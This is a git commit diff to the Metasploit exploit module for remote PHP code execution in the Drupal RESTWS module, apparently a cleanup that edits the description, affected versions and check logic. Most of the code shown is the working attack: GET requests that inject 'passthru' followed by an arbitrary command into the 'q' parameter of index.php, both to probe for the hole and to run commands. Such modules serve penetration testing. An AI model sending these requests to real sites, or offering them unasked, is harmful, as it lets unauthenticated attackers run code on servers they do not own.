Remove double spaces and fix checkcode

mdisec · mdisec · commit 089816236d71 · 2016-07-20T00:01:25.000+03:00
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -14,13 +12,17 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
       'Description'    => %q{
-        This module exploits the Drupal RESTWS module vulnerability.
+        This module exploits a Remote PHP Code Execution vulnerability in
+        Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
+        under the context of the web server user.
+
         RESTWS alters the default page callbacks for entities to provide
         additional functionality. A vulnerability in this approach allows
         an unauthenticated attacker to send specially crafted requests resulting
-        in arbitrary PHP execution
+        in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
+        versions are affected by issue.
 
-        This module was tested against RESTWS 7.x with Drupal 7.5 installation on Ubuntu server.
+        This module was tested against RESTWS 2.5 with Drupal 7.5 installation on Ubuntu server.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -47,7 +49,7 @@ def initialize(info={})
     register_options(
       [
         OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/'])
-      ], self.class
+      ]
     )
   end
 
@@ -57,11 +59,11 @@ def check
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-          'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
+        'q' => "taxonomy_vocabulary/#{r}/passthru/echo #{r}"
       }
     )
-    if res && res.body =~ /#{r}/
-      return Exploit::CheckCode::Appears
+    if res && res.body.include?(r)
+      return Exploit::CheckCode::Vulnerable
     end
     return Exploit::CheckCode::Safe
   end
@@ -73,7 +75,7 @@ def exploit
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, "index.php"),
       'vars_get' => {
-          'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
+        'q' => "taxonomy_vocabulary/#{random}/passthru/#{cmd}"
       }
     )
   end
